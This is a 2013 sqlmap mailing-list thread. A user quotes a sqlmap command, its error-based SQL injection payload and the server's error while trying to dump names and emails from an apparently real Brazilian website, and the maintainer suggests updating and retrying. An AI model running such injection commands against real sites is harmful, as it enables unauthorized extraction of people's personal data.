Re: [sqlmap-users] payload problem? "Incorrect syntax near"

SourceForge Headquarters 225 Broadway Suite 1600 San Diego, CA 92101 +1 (858) 422-6466

Hi.

Could you please update and retry it now?

Kind regards,
Miroslav Stampar

On Tue, Nov 12, 2013 at 2:13 PM, Vinicius Da Loop <
vin...@gm...> wrote:

> Hello,
>
> List db ok, list tables and columns OK, but when I try dump contents, got
> 'Incorrect syntax' error in html response, so I suspect that something is
> wrong about the payload sent by sqlmap:
>
> ./sqlmap.py -u "http://www.[snip].br/noticias/[snip].asp?ID=4416"
> --random-agent --threads=1 --technique=E -D 057 -T Cadastro -C
> CAD_ID,CAD_Nome,CAD_Email --dump -v 6
>
> [PAYLOAD] 4416 AND 9709=CONVERT(INT,(SELECT
> CHAR(113)+CHAR(119)+CHAR(122)+CHAR(114)+CHAR(113)+(SELECT
> ISNULL(CAST(LTRIM(STR(COUNT(*))) AS NVARCHAR(4000)),CHAR(32)) FROM
> 057.dbo.Cadastro)+CHAR(113)+CHAR(115)+CHAR(117)+CHAR(119)+CHAR(113)))
>
> [WARNING] HTTP error codes detected during run:
> 500 (Internal Server Error) - 2 times
>
> HTML RESPONSE:
>
> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial"
> size=2>error '80040e14'</font>
> <p>
> <font face="Arial" size=2>Line 1: Incorrect syntax near '057.'.</font>
>
> Any clue?
> Thanks!
>
>
> ------------------------------------------------------------------------------
> November Webinars for C, C++, Fortran Developers
> Accelerate application performance with scalable programming models.
> Explore
> techniques for threading, error checking, porting, and tuning. Get the most
> from the latest Intel processors and coprocessors. See abstracts and
> register
> http://pubads.g.doubleclick.net/gampad/clk?id=60136231&iu=/4140/ostg.clktrk
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>

-- 
Miroslav Stampar
http://about.me/stamparm